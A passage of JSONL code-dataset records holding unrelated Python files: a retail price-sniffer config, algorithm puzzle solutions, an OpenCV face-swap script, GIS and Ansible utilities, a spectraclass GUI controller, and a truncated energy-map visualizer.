QtWidgets.qApp.processEvents()\n","repo_name":"ant-trullo/smFiSH_software","sub_path":"SpotsIntensityRecord.py","file_name":"SpotsIntensityRecord.py","file_ext":"py","file_size_in_byte":3621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"34989407429","text":"import logging\nimport os\n\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\n\n# DB\ndb_file = os.path.join(BASE_DIR, \"products.db\")\ndb_table_structure = [ \"name\", \"price\", \"id\", \"pk\", \"timestamp\"]\nupdate_time_threshold = -6 # How many hours between updates\n\n# HTTP Requests\nhost = 'www.xxl.fi'\nurl_paths = {\n # Trekking equipment\n \"tents\": \"/retkeily-metsastys/telttailu/c/200200\",\n \"fishing\": \"/retkeily-metsastys/kalastus/c/220000\",\n \"camping_equipment\": \"/retkeily-metsastys/retkeilyvalineet/c/200600\",\n \"sleeping_gear\": \"/retkeily-metsastys/makuupussit-ja-makuualustat/c/201000\",\n \"drinking_bags\": \"/urheilu-ja-pallopelit/reput-ja-kassit/juomareput/c/100606\",\n # Clothes\n \"trekking_shoes\": \"/retkeily-metsastys/vaelluskengat-ja-metsastyskengat/c/200800\"\n}\n\n\n# Logging\nlog_level = logging.INFO\nlog_file = os.path.join(BASE_DIR, 'sniffer.log')\nlog_file_mode = \"w\"\ndb_logger_name = 'DBManager'\nhttp_logger_name = 'HttpClient'","repo_name":"jalspons/xxl_campaign_sniffer","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"14895430282","text":"from collections import deque\n\ndx = [1, 0, -1, 0]\ndy = [0, 1, 0, -1]\n\ndef bfs():\n cnt = 1\n while q:\n x, y = q.popleft()\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n if 0 <= nx < m and 0 <= ny < n:\n if not visited[nx][ny] and war[nx][ny] == war[x][y]:\n q.append((nx, ny))\n visited[nx][ny] = 1\n cnt += 1\n\n return cnt\n\nn, m = map(int, input().split())\nwar = [list(input()) for _ in range(m)]\nvisited = [[0] * n for i in range(m)]\n\nmy, enemy = 0, 0\n\nq = deque()\nfor i in range(m):\n for j in range(n):\n if not visited[i][j]:\n q.append((i, j))\n visited[i][j] = 1\n if war[i][j] == \"W\":\n my += bfs()**2\n else:\n enemy += bfs()**2\n\nprint(my, enemy)","repo_name":"JiyuChoi/Algorithm-Study","sub_path":"BOJ/[BFS] 전쟁 - 전투.py","file_name":"[BFS] 전쟁 - 전투.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"71901064864","text":"import numpy as np\nimport cv2\nimport os\n\nclass ModelParams():\n mean = [104, 117, 123]\n scale = 1.0\n in_width = 300\n in_height = 300\n\nclass Paths():\n folder_path = '../visuals'\n facial_landmarks_model_path = '../model/lbfmodel.yaml'\n model_path = '../model/deploy.prototxt'\n model_config_path = '../model/res10_300x300_ssd_iter_140000.caffemodel'\n\nclass FaceSwapper:\n __image = None\n __file = None\n __model_params = ModelParams()\n __paths = Paths()\n\n __face_detector = None\n __landmark_detector_obj = None\n\n def __init__(self):\n self.__face_detector = cv2.dnn.readNetFromCaffe(self.__paths.model_path, self.__paths.model_config_path)\n self.__landmark_detector_obj = cv2.face.createFacemarkLBF()\n self.__landmark_detector_obj.loadModel(self.__paths.facial_landmarks_model_path)\n\n def run(self):\n self.__loadImage()\n if (self.__image.any()):\n blob = cv2.dnn.blobFromImage(self.__image, scalefactor=self.__model_params.scale, size=(self.__model_params.in_width, self.__model_params.in_height),\n mean=self.__model_params.mean, swapRB=False, crop=False)\n self.__face_detector.setInput(blob)\n detections = self.__face_detector.forward()\n bbox = self.__getFaceBoundingBox(self.__image, detections)\n\n if (len(bbox) == 2):\n image_dst = self.__image.copy()\n retval, landmarks_list = self.__landmark_detector_obj.fit(image_dst, bbox)\n\n self.__warpSrcToDstFace(self.__image, image_dst, landmarks_list[0][0], landmarks_list[1][0])\n self.__warpSrcToDstFace(self.__image, image_dst, landmarks_list[1][0], landmarks_list[0][0])\n\n cv2.imshow('Final frame, press any key to save the results', image_dst)\n cv2.waitKey(0)\n\n self.__saveResult(image_dst, self.__file)\n else:\n print('[ERROR] Not enough faces detected across the image. Only 2 are needed to proceed')\n else:\n print('[WARINING] No image loaded. Finishing the program.')\n\n cv2.destroyAllWindows()\n\n def __warpSrcToDstFace(self, src_img, dst_img, src_face_landmarks, dst_face_landmarks):\n face_1_dst_landmarks = []\n face_2_dst_landmarks = []\n\n hullIndex = cv2.convexHull(np.array(src_face_landmarks), returnPoints=False)\n\n for i in range(0, len(hullIndex)):\n face_1_dst_landmarks.append(src_face_landmarks[hullIndex[i][0]])\n face_2_dst_landmarks.append(dst_face_landmarks[hullIndex[i][0]])\n\n rect = (0, 0, dst_img.shape[1], dst_img.shape[0])\n\n dt = self.__calculateDelaunayTriangles(rect, face_2_dst_landmarks)\n if len(dt) == 0:\n print(\"No Delanauy triangles calculated\")\n\n for i in range(0, len(dt)):\n t1 = []\n t2 = []\n\n for j in range(0, 3):\n t1.append(face_1_dst_landmarks[dt[i][j]])\n t2.append(face_2_dst_landmarks[dt[i][j]])\n\n self.__warpTriangle(src_img, dst_img, t1, t2)\n\n def __rectContains(self, rect, point):\n if point[0] < rect[0]:\n return False\n elif point[1] < rect[1]:\n return False\n elif point[0] > rect[2]:\n return False\n elif point[1] > rect[3]:\n return False\n return True\n\n def __applyAffineTransform(self, src, srcTri, dstTri, size):\n warpMat = cv2.getAffineTransform(np.float32(srcTri), np.float32(dstTri))\n dst = cv2.warpAffine(src, warpMat, (size[0], size[1]), None,\n flags=cv2.INTER_LINEAR, borderMode=cv2.BORDER_REFLECT_101)\n\n return dst\n \n def __warpTriangle(self, img1, img2, t1, t2):\n r1 = cv2.boundingRect(np.float32([t1]))\n r2 = cv2.boundingRect(np.float32([t2]))\n\n t1Rect = []\n t2Rect = []\n t2RectInt = []\n\n for i in range(0, 3):\n t1Rect.append(((t1[i][0] - r1[0]), (t1[i][1] - r1[1])))\n t2Rect.append(((t2[i][0] - r2[0]), (t2[i][1] - r2[1])))\n t2RectInt.append(((t2[i][0] - r2[0]), (t2[i][1] - r2[1])))\n\n mask = np.zeros((r2[3], r2[2], 3), dtype=np.float32)\n cv2.fillConvexPoly(mask, np.int32(t2RectInt), (1.0, 1.0, 1.0), 16, 0)\n\n img1Rect = img1[r1[1]:r1[1] + r1[3], r1[0]:r1[0] + r1[2]]\n\n size = (r2[2], r2[3])\n\n img2Rect = self.__applyAffineTransform(img1Rect, t1Rect, t2Rect, size)\n\n img2Rect = img2Rect * mask\n\n img2[r2[1]:r2[1]+r2[3], r2[0]:r2[0]+r2[2]] = img2[r2[1]:r2[1]+r2[3], r2[0]:r2[0]+r2[2]] * ((1.0, 1.0, 1.0) - mask)\n img2[r2[1]:r2[1]+r2[3], r2[0]:r2[0]+r2[2]] = img2[r2[1]:r2[1]+r2[3], r2[0]:r2[0]+r2[2]] + img2Rect\n\n def __calculateDelaunayTriangles(self, rect, points):\n subdiv = cv2.Subdiv2D(rect)\n\n for p in points:\n if p[0] > self.__image.shape[1]:\n p[0] = self.__image.shape[1] - 1\n\n if p[1] > self.__image.shape[0]:\n p[1] = self.__image.shape[0] - 1\n\n subdiv.insert((p[0], p[1]))\n\n triangleList = subdiv.getTriangleList()\n\n delaunayTri = []\n\n for t in triangleList:\n pt = []\n pt.append((t[0], t[1]))\n pt.append((t[2], t[3]))\n pt.append((t[4], t[5]))\n\n pt1 = (t[0], t[1])\n pt2 = (t[2], t[3])\n pt3 = (t[4], t[5])\n\n if self.__rectContains(rect, pt1) and self.__rectContains(rect, pt2) and self.__rectContains(rect, pt3):\n ind = []\n for j in range(0, 3):\n for k in range(0, len(points)):\n if(abs(pt[j][0] - points[k][0]) < 1.0 and abs(pt[j][1] - points[k][1]) < 1.0):\n ind.append(k)\n if len(ind) == 3:\n delaunayTri.append((ind[0], ind[1], ind[2]))\n\n return delaunayTri\n\n def __getFaceBoundingBox(self, image, detections, detection_threshold=0.90):\n height, width = image.shape[:2]\n faces = []\n\n for i in range(detections.shape[2]):\n confidence = detections[0, 0, i, 2]\n\n if (confidence >= detection_threshold):\n box = detections[0, 0, i, 3:7] * np.array([width, height, width, height])\n (x1, y1, x2, y2) = box.astype(\"int\")\n\n face_width = x2 - x1\n face_height = y2 - y1\n\n faces.append([x1, y1, face_width, face_height])\n \n return np.array(faces).astype(int)\n\n def __loadImage(self):\n try:\n for file in os.listdir(self.__paths.folder_path):\n self.__file = file\n self.__image = cv2.imread(self.__paths.folder_path + '/' + file, cv2.IMREAD_COLOR)\n print('[INFO] Loaded image')\n except:\n print('[ERROR] An error occured while reading the images')\n\n def __saveResult(self, image, image_name):\n try:\n filename = self.__paths.folder_path + '/' + 'swapped-' + image_name\n cv2.imwrite(filename, image)\n print('[INFO] Correctly saved image as:', filename)\n except:\n print('[ERROR] An error occurred while saving the image')\n\n\n\nif __name__ == \"__main__\":\n FaceSwapper_obj = FaceSwapper()\n FaceSwapper_obj.run()","repo_name":"Josgonmar/Face-swapper","sub_path":"src/FaceSwapper.py","file_name":"FaceSwapper.py","file_ext":"py","file_size_in_byte":7349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"22838814673","text":"#!/usr/bin/env python3\r\n__author__ = 'Gerry Gabrisch (geraldg@lummi-nsn.gov)'\r\n__date__ = 'February 2023'\r\n\r\nimport sys\r\nimport traceback\r\nimport arcpy\r\nimport os\r\n\r\ntry:\r\n ######### USER DEFINED PARAMETERS ####################\r\n workspace = r\"E:\\GISPublicGerry20210211\\GerryG\\GPS\\Export\"\r\n out_fc = r\"C:\\gTemp\\all_gnss_pre2020.shp\"\r\n ################################################################\r\n print('Running...')\r\n #a list of files and their paths to merge together...\r\n feature_classes = []\r\n #walk the directory and all subdirectories and get any file that is not a PosnPnt.shp\r\n for dirpath, dirnames, datatypes in arcpy.da.Walk(workspace,datatype=\"FeatureClass\",type=\"Point\"):\r\n for filename in datatypes:\r\n if filename == 'PosnPnt.shp':\r\n pass\r\n else:\r\n feature_classes.append(os.path.join(dirpath, filename))\r\n arcpy.management.Merge(feature_classes, out_fc, \"\", \"ADD_SOURCE_INFO\")\r\n print('Finished without error')\r\nexcept:\r\n tb = sys.exc_info()[2]\r\n tbinfo = traceback.format_tb(tb)[0]\r\n print (\"PYTHON ERRORS:\\nTraceback info:\\n\" + tbinfo + \"\\nError Info:\\n\" + str(sys.exc_info()[1]))\r\n","repo_name":"LummiGIS/merge_all_trimble_rover_files","sub_path":"merge_all_trimble_gnss_files.py","file_name":"merge_all_trimble_gnss_files.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"30663478609","text":"from typing import List\n\n\nclass Solution:\n def addOperators(self, num: str, target: int) -> List[str]:\n def dfs(left, right, op1, op2, op3):\n op = op1 + op2 * op3\n if not right:\n if op == target:\n res.append(left)\n return\n r = int(right[0])\n dfs(left + '+' + right[0], right[1:], op, 1, r)\n dfs(left + '-' + right[0], right[1:], op, -1, r)\n dfs(left + '*' + right[0], right[1:], op1, op2 * op3, r)\n if op3:\n dfs(left + right[0], right[1:], op1, op2, op3 * 10 + r)\n\n res = []\n dfs(num[0], num[1:], 0, 1, int(num[0])) # exp can always be truncated to op1+op2*op3\n return res\n\n\nmine = sorted(Solution().addOperators(\"123456789\", 45))\n","repo_name":"yutao-li/leetcode","sub_path":"282.py","file_name":"282.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"36738103857","text":"import os, ipywidgets as ipw\nfrom spectraclass.model.base import SCSingletonConfigurable\nfrom spectraclass.util.logs import LogManager, lgm, exception_handled, log_timing\nfrom typing import List, Union, Tuple, Optional, Dict, Callable, Set\nfrom spectraclass.gui.control import UserFeedbackManager, ufm\nfrom spectraclass.gui.spatial.widgets.markers import Marker\nimport numpy as np\nimport xarray as xa\n\nclass ActionEvent(object):\n\n def __init__( self, type: str ):\n super(ActionEvent, self).__init__()\n self._type = type\n\nclass LabelEvent(ActionEvent):\n\n def __init__( self, type: str, label_map: np.ndarray ):\n super(LabelEvent, self).__init__( type )\n self._label_map = label_map\n\n @property\n def label_map(self):\n return self._label_map\n\nclass SpectraclassController(SCSingletonConfigurable):\n\n HOME = os.path.dirname( os.path.dirname( os.path.dirname(os.path.realpath(__file__)) ) )\n custom_theme = False\n\n def __init__(self):\n super(SpectraclassController, self).__init__()\n self._action_events = []\n\n @classmethod\n def set_spectraclass_theme(cls):\n from IPython.display import display, HTML\n if cls.custom_theme:\n theme_file = os.path.join( cls.HOME, \"themes\", \"spectraclass.css\" )\n with open( theme_file ) as f:\n css = f.read().replace(';', ' !important;')\n display(HTML('Customized changes loaded.' % css))\n\n def addActionEvent(self, event: ActionEvent ):\n self._action_events.append( event )\n\n def popActionEvent(self) -> ActionEvent:\n return self._action_events.pop()\n\n def lastActionEvent(self) -> ActionEvent:\n return self._action_events[-1]\n\n def process_menubar_action(self, mname, dname, op, b ):\n print(f\" process_menubar_action.on_value_change: {mname}.{dname} -> {op}\")\n\n def show_gpu_usage(self):\n os.system(\"nvidia-smi\")\n\n @property\n def color_map(self) -> str:\n from spectraclass.gui.pointcloud import PointCloudManager, pcm\n return pcm().color_map\n\n @exception_handled\n def update_current_class(self, iclass: int ):\n from spectraclass.gui.lineplots.manager import GraphPlotManager, gpm\n from spectraclass.model.labels import LabelsManager, lm\n from spectraclass.gui.spatial.map import MapManager, mm\n gids = lm().getGids( iclass )\n gpm().plot_graph( Marker( \"marker\", gids, iclass ) )\n mm().set_region_class( iclass )\n\n def gui( self, **kwargs ):\n raise NotImplementedError()\n\n @exception_handled\n def mark(self):\n from spectraclass.model.labels import LabelsManager, lm\n from spectraclass.gui.pointcloud import PointCloudManager, pcm\n # lgm().log(f\" ----> Controller[{self.__class__.__name__}] -> MARK \")\n\n @exception_handled\n def mask(self):\n from spectraclass.model.labels import LabelsManager, lm\n from spectraclass.gui.spatial.map import MapManager, mm\n lgm().log(f\" ----> Controller[{self.__class__.__name__}] -> MASK \")\n# mm().create_mask( lm().current_cid )\n\n @exception_handled\n def clear(self):\n from spectraclass.gui.pointcloud import PointCloudManager, pcm\n from spectraclass.gui.lineplots.manager import GraphPlotManager, gpm\n from spectraclass.model.labels import LabelsManager, lm\n from spectraclass.gui.spatial.map import MapManager, mm\n lgm().log(f\" ----> Controller[{self.__class__.__name__}] -> CLEAR \")\n lm().clearMarkers()\n mm().clearMarkers()\n gpm().clear()\n pcm().clear()\n mm().plot_labels_image()\n\n @exception_handled\n def embed(self):\n from spectraclass.gui.spatial.map import MapManager, mm\n from spectraclass.gui.pointcloud import PointCloudManager, pcm\n from spectraclass.reduction.embedding import ReductionManager, rm\n lgm().log(f\" ----> Controller[{self.__class__.__name__}] -> EMBED \")\n ufm().show( \"Computing 3D embedding\" )\n mm().update_pcm()\n embedding = rm().umap_embedding()\n pcm().update_plot( points=embedding )\n ufm().clear()\n\n @exception_handled\n def undo_action(self):\n from spectraclass.gui.pointcloud import PointCloudManager, pcm\n from spectraclass.gui.spatial.map import MapManager, mm\n from spectraclass.model.labels import LabelsManager, Action, lm\n from spectraclass.gui.lineplots.manager import GraphPlotManager, gpm\n action: Optional[Action] = lm().popAction()\n if action is not None:\n lgm().log(f\" ----> Controller[{self.__class__.__name__}] -> UNDO: {action} \")\n if action.type == \"spread\":\n marker = lm().popMarker( \"labels\" )\n lgm().log(f\"undo_action-> pop marker: {marker}\")\n mm().plot_labels_image( lm().get_label_map() )\n if action.type == \"classify\":\n mm().plot_labels_image( lm().get_label_map() )\n\n @log_timing\n def cluster(self):\n from spectraclass.learn.cluster.manager import clm\n from spectraclass.data.base import DataManager, dm\n from spectraclass.gui.spatial.map import MapManager, mm\n ufm().show(f\"Creating clusters using {clm().mid} \")\n cluster_input: xa.DataArray = dm().getModelData()\n cluster_image: xa.DataArray = clm().cluster( cluster_input )\n mm().plot_cluster_image( cluster_image )\n ufm().show(f\"Clustering completed\")\n\n def learn(self):\n from spectraclass.learn.manager import ClassificationManager, cm\n ufm().show(\"Learning Classification Mapping... \")\n cm().learn_classification()\n ufm().show( \"Classification Mapping learned\" )\n\n # @log_timing\n # def learn(self):\n # from spectraclass.learn.manager import ClassificationManager, cm\n # from spectraclass.data.base import DataManager, dm\n # from spectraclass.model.labels import LabelsManager, Action, lm\n # ufm().show(\"Learning Classification Mapping... \")\n # lgm().log(f\" ----> Controller[{self.__class__.__name__}] -> LEARN \")\n # embedding: xa.DataArray = dm().getModelData()\n # labels_data: xa.DataArray = lm().getLabelsArray()\n # labels_mask = (labels_data > 0)\n # filtered_labels: np.ndarray = labels_data.where(labels_mask, drop=True).astype(np.int32).values\n # filtered_point_data: np.ndarray = embedding.where(labels_mask, drop=True).values\n # lgm().log(f\"SHAPES--> embedding: {embedding.shape}, labels_data: {labels_data.shape}, filtered_labels: {filtered_labels.shape}, filtered_point_data: {filtered_point_data.shape}\" )\n # cm().learn_classification( filtered_point_data, filtered_labels )\n # ufm().show( \"Classification Mapping learned\" )\n\n @log_timing\n def propagate_selection(self, niters=1):\n from spectraclass.model.labels import LabelsManager, Action, lm\n from spectraclass.gui.spatial.map import MapManager, mm\n from spectraclass.data.spatial.tile.manager import TileManager, tm\n from spectraclass.data.spatial.tile.tile import Block, Tile\n from spectraclass.graph.manager import ActivationFlow, ActivationFlowManager, afm\n block: Block = tm().getBlock()\n ufm().show(\"Generalizing markers\")\n flow: ActivationFlow = afm().getActivationFlow()\n lm().log_markers(\"pre-spread\")\n self._flow_class_map: np.ndarray = lm().getLabelsArray().data\n catalog_pids = np.arange(0, self._flow_class_map.shape[0])\n lgm().log(f\"SPREAD: flow_class_map shape={self._flow_class_map.shape}, catalog_pids shape={catalog_pids.shape} \")\n converged = flow.spread( self._flow_class_map, niters )\n\n if converged is not None:\n self._flow_class_map = flow.get_classes()\n all_classes = ( lm().current_cid == 0 )\n for cid, label in enumerate( lm().labels ):\n if all_classes or ( lm().current_cid == cid ):\n new_pids: np.ndarray = catalog_pids[ self._flow_class_map == cid ]\n if new_pids.size > 0:\n lgm().log(f\" @@@ spread_selection: cid={cid}, label={label}, #new_indices={len(new_pids)}\" )\n gids: np.ndarray = block.pids2gids( new_pids )\n lm().mark_points( gids, cid, \"labels\" )\n lm().addAction( \"spread\", \"application\", cid=cid )\n mm().plot_labels_image( lm().get_label_map() )\n lm().log_markers(\"post-spread\")\n ufm().show(\"Marker generalization complete\")\n return converged\n\n @exception_handled\n def display_distance(self, niters=100):\n from spectraclass.graph.manager import ActivationFlow, ActivationFlowManager, afm\n from spectraclass.model.labels import LabelsManager, Action, lm\n from spectraclass.gui.pointcloud import PointCloudManager, pcm\n ufm().show(\"Coloring by Distance\")\n lgm().log(f\" ----> Controller[{self.__class__.__name__}] -> DISTANCE \")\n seed_points: xa.DataArray = lm().getSeedPointMask()\n flow: ActivationFlow = afm().getActivationFlow()\n if flow.spread( seed_points.data, niters, bidirectional=True ) is not None:\n pcm().color_by_value( flow.get_distances(), distance=True )\n ufm().show(\"Done Coloring by Distance\")\n\n @exception_handled\n def add_marker(self, marker: Marker):\n from spectraclass.model.labels import LabelsManager, Action, lm\n from spectraclass.gui.lineplots.manager import GraphPlotManager, gpm\n from spectraclass.gui.pointcloud import PointCloudManager, pcm\n if marker is not None:\n lgm().log( f\" #APP-> Add Marker[{marker.cid}] \")\n lm().addMarker( marker )\n gpm().plot_graph( marker )\n pcm().addMarker(marker)\n\n @exception_handled\n def remove_marker(self, marker: Marker):\n from spectraclass.model.labels import LabelsManager, Action, lm\n from spectraclass.gui.lineplots.manager import GraphPlotManager, gpm\n from spectraclass.gui.pointcloud import PointCloudManager, pcm\n if marker is not None:\n lm().clearMarker( marker )\n gpm().remove_marker( marker )\n pcm().deleteMarkers(marker.gids.tolist())\n\n def get_marked_pids(self) -> Dict[int,Set[int]]:\n from spectraclass.model.labels import LabelsManager, Action, lm\n marked_pids = {}\n for marker in lm().markers:\n new_pids = marker.gids[ np.where(marker.gids >= 0)].tolist()\n current_pids = marked_pids.get( marker.cid, set() )\n marked_pids[ marker.cid ] = current_pids.union( set(new_pids) )\n return marked_pids\n\n @exception_handled\n def color_pointcloud( self, color_data: np.ndarray = None, **kwargs ):\n from spectraclass.gui.pointcloud import PointCloudManager, pcm\n pcm().color_by_value( color_data, **kwargs )\n\n\ndef app() -> SpectraclassController:\n from spectraclass.data.base import DataManager, dm\n rv = dm().app()\n return rv\n\n\n\n\n\n\n\n\n","repo_name":"nasa-nccs-cds/spectraclass","sub_path":"spectraclass/application/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":11248,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"7"} +{"seq_id":"19837721649","text":"from __future__ import absolute_import, division, print_function\n__metaclass__ = type\n\nimport json\n\nimport pytest\n\nfrom ansible.module_utils import basic\nfrom ansible.module_utils._text import to_bytes\n\n\nclass AnsibleRunEnd(Exception):\n \"\"\" Termination signal \"\"\"\n\n\nclass AnsibleRun:\n def __init__(self):\n self.success = None\n self.result = None\n\n def run(self, module, **args):\n a = dict(\n _ansible_remote_tmp=\"/tmp\",\n _ansible_keep_remote_files=False,\n )\n a.update(args)\n basic._ANSIBLE_ARGS = to_bytes(json.dumps(dict(ANSIBLE_MODULE_ARGS=a)))\n try:\n module.main()\n except AnsibleRunEnd:\n # This is what we expect\n return\n assert False, \"Module is not calling exit_json or fail_json.\"\n\n def exit_json(self, **result):\n self.success = True\n self.result = result\n raise AnsibleRunEnd()\n\n def fail_json(self, **result):\n self.success = False\n self.result = result\n self.result[\"changed\"] = result.get(\"changed\", False)\n raise AnsibleRunEnd()\n\n\n@pytest.fixture\ndef ansible_run(mocker):\n ansible_run = AnsibleRun()\n mocker.patch.multiple(\n basic.AnsibleModule,\n exit_json=ansible_run.exit_json,\n fail_json=ansible_run.fail_json,\n )\n return ansible_run\n","repo_name":"xlab-steampunk/steampunk.unit","sub_path":"tests/unit/modules/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"} +{"seq_id":"4836481894","text":"import cv2\r\n\r\n# VideoCapture() is a function in cv2 library to read video, in\r\n# argument section we write path of image where video is present\r\n\r\ncap = cv2.VideoCapture(\"Resources/video.mp4\")\r\n\r\n# video is a series of images so while loop\r\nwhile True:\r\n success, img = cap.read()\r\n cv2.imshow(\"Video\",img)\r\n# wait for delay and looks for 'q' to break the loop\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n","repo_name":"Shyam9899/Virtual-Paint-Using-OpenCV","sub_path":"Reading_Video.py","file_name":"Reading_Video.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"247078269","text":"# --- Imports ---\nimport logging\nimport random\nimport json\nimport os\nimport concurrent.futures as cf\nimport itertools\nimport io\nimport requests\nfrom requests.adapters import HTTPAdapter\nfrom requests.packages.urllib3.util.retry import Retry\n\nimport numpy as np\nimport pandas as pd\nimport geopandas as gpd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as mpatches\n\nimport vapor.config as config\n\nlog = logging.getLogger(\"vapor\")\n\nnrel_color_dict = ['#0077C8', #darkblue\n '#00A9E0', #lightblue\n '#658D1B', #darkgreen\n '#84BD00', #lightgreen\n '#FFC72C', #yellow\n '#DE7C00', #orange\n '#5B6770', #darkgray\n '#C1C6C8'] #lightgray\n\ntech_dict = {'pv':nrel_color_dict[4],\n 'wind':nrel_color_dict[1],\n 'batt':nrel_color_dict[3]}\n\nbatt_size_dict = {0:'o', 25:'P', 100:'^'}\n\nscen_label_dict = {\n 'StdScen20_LowRECost':'Low Cost',\n 'StdScen20_MidCase':'Mid Cost',\n 'StdScen20_HighRECost':'High Cost'}\n\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# ~~~~~~~~~~~~~~~~~~ VISUALIZATION OF OUTPUT ~~~~~~~~~~~~~~~~~~~~~\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nclass Visualizer():\n def __init__(self, results, aggregate_region,\n legend=True,\n last_year=config.LAST_YEAR,\n region_label_pct=0.4):\n \n assert isinstance(legend, bool)\n assert isinstance(results, pd.DataFrame)\n \n self.legend = legend\n self.last_year = last_year\n self.region_label_pct = region_label_pct #put labels on geographys larger than this percentile size. 0 for no labels.\n \n # --- Merge on geometry to data ---\n geo = gpd.read_file(os.path.join('data','geography','ReEDS_Resource_Regions.shp'))\n geo = geo[[aggregate_region, 'geometry']]\n geo.rename({aggregate_region:'region'}, inplace=True, axis='columns')\n geo = geo.dissolve(by='region')\n\n self.gdf = geo.merge(results, on='region', how='inner')\n\n self.cbarloc = [0.2, 0.2, 0.2, 0.05] #location for legend color bar\n self.colorscheme = 'Reds' #matplotlib colorscheme\n self.units = None\n \n def _update_crs(self, crs=2163):\n \"\"\"Update the CRS to US National Atlas Standard (non-meractor).\"\"\"\n self.gdf= self.gdf.to_crs(f'epsg:{crs}')\n \n def _update_units(self, column, round_at=0):\n \"\"\"Update units for the selected column.\"\"\"\n \n unit_df = self.gdf.copy()\n\n MW_size = unit_df['system_capacity'] / 1000\n\n if column in ['cambium_co2_rate_marg', 'cambium_co2_rate_avg', 'cambium_co2_rate_lrmer', 'lifetime_cambium_co2_rate_marginal', 'lifetime_cambium_co2_rate_avg', 'lifetime_cambium_co2_rate_lrmer']:\n self.units = 'Mil Tons'\n unit_df[column] = unit_df[column] / 1000000 #convert from kg/W to MT/MW # IS THIS CORRECT? TODO: check this!\n self.suffix = 'Savings'\n \n elif column in ['lcoe_real','lcoe_nom', 'lppa_nom', 'lppa_real','ppa']:\n self.units = '$/MWh'\n unit_df[column] = unit_df[column] * 10 #convert from Cents/kWh to $/MWh\n self.colorscheme = self.colorscheme + '_r' #reverse colormap\n self.suffix = 'Price'\n \n elif column in ['cambium_enduse_energy_value','cambium_busbar_energy_value','cambium_grid_value',\n 'cambium_capacity_value','cambium_as_value','cambium_portfolio_revenue']:\n self.units = '$/MW/yr'\n unit_df[column] = unit_df[column] / MW_size #TODO: check units\n self.suffix = 'Savings'\n\n elif column in ['project_return_aftertax_irr']:\n self.units = '%'\n self.suffix = ''\n\n elif column in ['project_return_aftertax_npv', 'lifetime_cambium_grid_value']:\n unit_df[column] = unit_df[column] / 1000000\n self.units = '$ Mil'\n self.suffix = ''\n\n elif column in ['marginal_cost_mwh']:\n self.units = '$/MWh'\n self.suffix = ''\n \n else:\n self.units = ''\n self.suffix = ''\n \n # --- Round ---\n unit_df[column] = unit_df[column].round(round_at)\n return unit_df\n \n \n def merged_choropleth(self, column, scenario, batt_size=0, ascending=False, storage=True, reverse_cmap=False, title=None, *kwargs):\n\n # --- Update crs ---\n self._update_crs()\n \n # --- Update units ---\n plot_df = self._update_units(column)\n\n # --- subset scenario ---\n assert scenario in plot_df['scenario'].unique()\n plot_df = plot_df.loc[(plot_df['scenario'] == scenario) & (plot_df['batt_size'] == batt_size)]\n\n # --- pick best tech for each geo ---\n plot_df.sort_values(column, ascending=ascending, inplace=True)\n plot_df.drop_duplicates(subset=['region'], keep='first', inplace=True)\n \n # --- Clean up column string ---\n clean_column = column.replace('_',' ').title()\n clean_column = f\"{clean_column} {self.suffix}\"\n \n fig, ax = plt.subplots(dpi=200)\n\n for tech in plot_df['tech'].unique():\n\n tech_df = plot_df.loc[plot_df['tech'] == tech]\n \n if tech == 'pv':\n cmap = 'Oranges'\n elif tech == 'wind':\n cmap = 'Blues'\n\n if reverse_cmap:\n cmap = cmap + '_r'\n \n tech_df.plot(column, edgecolor='k', cmap=cmap, alpha=0.8, linewidth=0.2, ax=ax)\n \n # if self.legend:\n # vmax = max(tech_df[column])\n # vmed = round(tech_df[column].mean(),0)\n # vmin = min(tech_df[column])\n \n # fig = ax.get_figure()\n # cax = fig.add_axes(self.cbarloc) #set size and location of cbar\n \n # # --- Create array of values for color bar ---\n # sm = plt.cm.ScalarMappable(cmap=cmap, norm=plt.Normalize(vmin=vmin, vmax=vmax))\n # sm._A = []\n # cbar = fig.colorbar(sm, cax=cax, alpha = 0.8, orientation='horizontal', ticks = [vmin,vmed,vmax])\n # cbar.ax.set_xticklabels([f\"{int(vmin):,}\", f\"{int(vmed):,}\\n{self.units}\", f\"{int(vmax):,}\"])\n \n if self.region_label_pct > 0:\n \n tech_df['area_pct'] = tech_df.area.rank(pct=True)\n \n for _, row in tech_df.iterrows():\n if row['area_pct'] > self.region_label_pct:\n ax.annotate(s=f\"{round(row[column], 1):,}\",\n xy=row['geometry'].centroid.coords[0],\n horizontalalignment='center',\n size=7)\n \n ax.axis('off')\n \n if title == None:\n ax.set_title(f\"{clean_column} ({self.units}) through {self.last_year}\")\n else:\n ax.set_title(title)\n \n def choropleth(self, column, scenario, tech, batt_size=0, ascending=False, storage=True, reverse_cmap=False, title=None, *kwargs):\n\n # --- Update crs ---\n self._update_crs()\n \n # --- Update units ---\n plot_df = self._update_units(column)\n\n # --- subset scenario ---\n assert scenario in plot_df['scenario'].unique()\n plot_df = plot_df.loc[(plot_df['scenario'] == scenario) 